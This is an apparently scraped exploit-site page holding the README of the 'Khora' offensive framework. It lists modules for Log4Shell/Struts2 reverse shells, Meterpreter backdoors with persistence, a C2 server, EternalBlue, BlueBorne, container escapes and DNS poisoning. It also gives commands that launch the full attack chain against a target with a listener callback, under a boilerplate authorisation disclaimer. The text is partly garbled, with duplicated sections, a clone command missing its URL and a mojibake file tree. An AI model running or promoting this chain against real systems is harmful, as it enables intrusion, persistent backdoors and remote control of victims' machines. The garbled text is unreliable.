Share
## https://sploitus.com/exploit?id=ECF1DEC3-9A28-55AB-9210-01617DEFCC0E
# Khora Exploit Framework v2.0
============================
Modular pentest toolkit | 10 Exploit Modules | Python3
## DEPLOY
```bash
git clone
cd khora-framework
pip3 install -r requirements.txt
python3 client.py 10.10.11.59 10.10.14.1
Modular pentest toolkit | 10 Exploit Modules | Python3
DEPLOY
------
git clone
cd khora-exploit
pip3 install -r requirements.txt
python3 client.py 10.10.11.59 10.10.14.1
MODULES (10)
Recon: nmap_module.py โ nmap_tcp.txt, nmap_vuln.txt
RCE: rce_module.py โ Struts2/Log4Shell reverse shell
Backdoors: backdoor_module.pyโ linux_x64_meter.elf, win_meter.exe
Bluetooth: blueborne_module.pyโ CVE-2017-0785 L2CAP crash
Cracking: cracker_module.py โ NTLM/SHA256/Kerberos cracked.txt
Jailbreak: jailbreak_module.pyโ Docker/K8s root escape
C2: c2_module.py โ HTTP stager + TCP handler
DNS Spoof: dns_spoof_module.pyโ Scapy DNS poisoning
Sniffer: sniffer_module.py โ WiFi/BLE devices.txt
SMB: eternalblue_module.pyโ MS17-010 EternalBlue
khora-framework/
โโโ README.md # <- Readme file
โโโ client.py # main orchestrator
โโโ modules/
โ โโโ nmap_module.py # full vuln scanning
โ โโโ RCE_module.py # struts2/log4shell/shellshock
โ โโโ backdoor_module.py # linux/windows stagers + persistence
โ โโโ blueborne_module.py # bluetooth RCE
โ โโโ cracker_module.py # hashcat NTLM/SHA/kerberos
โ โโโ jailbreaking_module.py # docker/k8s escapes
โ โโโ c2_module.py # HTTP/TCP C2 server
โ โโโ dns_spoof_module.py # scapy DNS poisoning
โ โโโ sniffer_module.py # wifi/BLE packet capture
โ โโโ eternalblue_module.py # MS17-010
โโโ payloads/ # generated stagers
โโโ results/ # results output
โโโ requirements.txt # python dependencies
USAGE
-----
"""
# Full chain
python3 client.py 10.10.11.59 10.10.14.1
# Single module
python3 client.py 10.10.11.59 10.10.14.1 -m rce
python3 client.py 10.10.11.59 10.10.14.1 -m eternalblue
TARGET: 192.168.1.100
LHOST: 10.10.14.1:4444
"""
DISCLAIMER
----------
this tool is only for Penetration Testing in authorized environments.
The author is not responsible for any misuse or damage caused by this tool.
Use at your own risk. (I have permission and am authorized to perform this pentest)